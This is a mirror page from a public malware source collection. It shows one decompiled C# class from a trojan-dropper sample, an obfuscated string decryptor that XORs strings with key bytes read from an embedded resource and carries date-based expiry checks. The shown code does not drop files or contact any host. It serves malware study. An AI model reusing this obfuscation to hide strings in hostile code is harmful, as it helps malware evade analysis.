mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-19 09:56:10 +00:00
f2ac1ece55
add
54 lines
1.7 KiB
C#
54 lines
1.7 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type:
|
|
// Assembly: App, Version=6.11.5.1, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 843578DF-6576-45E1-B6A2-485233E8A253
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.bfdc-b8ca4f2cda6f49778d6840b2eff24c49fe4212060200c667d42e2986a9ec3a86.exe
|
|
|
|
using System;
|
|
using System.IO;
|
|
using System.Reflection;
|
|
|
|
internal sealed class \uE008
|
|
{
|
|
public static string \uE000(string _param0, int _param1)
|
|
{
|
|
if (DateTime.Now > new DateTime(634748065894698000L))
|
|
throw new Exception();
|
|
return string.Intern(\uE008.\uE001.\uE000.\uE000(_param0, _param1));
|
|
}
|
|
|
|
public static string \uE000 => "b04a440ecec501b0";
|
|
|
|
private sealed class \uE001
|
|
{
|
|
public static readonly \uE008.\uE001 \uE000;
|
|
private byte[] \uE001;
|
|
|
|
static \uE001()
|
|
{
|
|
if (DateTime.Now > new DateTime(634748065894074000L))
|
|
throw new Exception();
|
|
\uE008.\uE001.\uE000 = new \uE008.\uE001();
|
|
}
|
|
|
|
private \uE001()
|
|
{
|
|
Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(\uE008.\uE000);
|
|
if (manifestResourceStream == null)
|
|
return;
|
|
this.\uE001 = new byte[256];
|
|
manifestResourceStream.Read(this.\uE001, 0, this.\uE001.Length);
|
|
}
|
|
|
|
public string \uE000(string _param1, int _param2)
|
|
{
|
|
int length = _param1.Length;
|
|
int index = _param2 & (int) byte.MaxValue;
|
|
char[] charArray = _param1.ToCharArray();
|
|
while (--length >= 0)
|
|
charArray[length] = (char) ((uint) charArray[length] ^ ((uint) this.\uE001[index] | (uint) _param2));
|
|
return string.Intern(new string(charArray));
|
|
}
|
|
}
|
|
}
|